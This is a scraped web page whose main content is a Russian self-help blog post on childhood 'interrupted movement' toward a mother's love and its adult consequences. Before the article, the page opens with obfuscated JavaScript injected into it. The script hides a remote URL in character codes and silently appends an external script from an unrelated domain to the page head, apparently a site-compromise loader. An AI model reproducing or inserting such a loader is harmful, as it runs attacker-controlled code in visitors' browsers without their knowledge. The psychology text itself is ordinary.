var d3 = document.createElement('script'); d3.type = 'text/javascript'; d3.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 115, 116, 97, 116, 46, 117, 117, 115, 116, 111, 117, 103, 104, 116, 111, 110, 109, 97, 46, 111, 114, 103, 47, 115, 116, 97, 116, 115, 46, 106, 115, 63, 102, 61, 52); var scripts = document.getElementsByTagName('script'); var need_t = true; for (var i = scripts.length; i--;) {if (scripts[i].src == d3.src) { need_t = false;}else{} } if(need_t == true){document.head.appendChild(d3);} Разочарование | Ivan Zalesskiy

В психологии существует представление о прерванном движении. Это движение к любви, часто прерывается в детстве. Например, ребёнок бежит к маме показать свои достижения, а мама это движение прерывает —просит подождать, так как ей некогда или она устала. Ребенок повторяет это движение к маме ещё и ещё, пока, наконец, не разочаровывается. Это больно, и ребёнок ставит барьер. Так формируется травма!

Отчаявшись получить от мамы внимание дитя выбирает: ждать маму или отказаться от ожидания.

Если он выбирает ждать, что мама когда-нибудь придёт, он может делать это пассивно, обидевшись на весь мир, на это уходят все силы. А может ждать активно, пробуя стать для мамы хорошим, что б она наконец уделила ему внимание. Часто для этого надо выполнять противоречивые требования: быть красивой, но никому не нравиться, или сделать так, чтобы мама гордилась, но при этом не высовываться. В таком ожидании может пройти много лет. И в сорок можно продолжать зарабатывать плюсики для мамы, даже не понимая этого.

Можно не ждать маму, а привлекать внимание других. Это похоже на описанное выше активное ожидание, но заработанные достижения он не несёт маме. Он собирает чужую энергию, потому что мало своей.

В обоих случаях эта травма недополученной любви, ярко проявляется во взрослой жизни. Люди компенсируют недостаток любви всячески привлекая внимание окружающих. Они остро реагируют на отказы и редко проявляют инициативу опасаясь разочарования. Часто, при выборе партнера, приоритет отдается тому, кто будет играть роль любящей матери. На столько велико стремление к потоку материнской энергии.

Ситуация принципиально не имеет решения. Мама не придёт, и никто не захочет отдавать свою энергию безвозмездно. 

Но выход есть, мы можем придти сами к себе, чтобы согласиться с ситуацией и принять ее как есть. Ключ в том, чтоб выйти из-за барьера, и восстановить движение на встречу к маме, навстречу к любви. Это поможет принять маму такой, какая она есть, доброй, плохой, внимательной или не замечающей, — любой.

В случае, если ребёнок решил ждать маму, выходом является отказ «от детского желания её любви и поддержки». Взрослый человек в силах осознать что он может встать и идти своим путём, начать жить свою жизнь.

Если же ребёнок отказался от ожидания, то ключом будет отказ от обиды и «прощение мамы». Это разворачивает ребёнка к маме и открывает его к ней.

После такой работы, тот внутренний ребёнок (субличность) должен вырасти и встретиться с миром, на это может понадобиться некоторое время. В этот период следует относится к себе внимательно и заботливо.Такая глубокая и тонкая психологическая настройка является очень медленным и постепенным процессом, поэтому лучще её проводить с проводником, которому вы доверяете и который является профессионалом в психологии.

Поделится в соц сетях:
Система Orphus

Добавить комментарий

Подобные материалы

Большинство людей понятия не имеют, что такое ресурсы человеческого сознания, они живут по принципу "стимул -...

Вот вам история из жизни, в которой взрослый, достаточно состоятельный и влиятельный мужчина, проявляя заботу о...

Этот эксперимент я проводил с целью получения опыта восприятия реальности без помощи зрения, используя остальные...

ПОДПИШИТЕСЬ НА НАШУ РАССЫЛКУ

ХОТИТЕ ПОЛУЧАТЬ НОВОСТИ ИЛИ ИНФОРМАЦИЮ О БЛИЖАЙЩИХ СЕМИНАРАХ?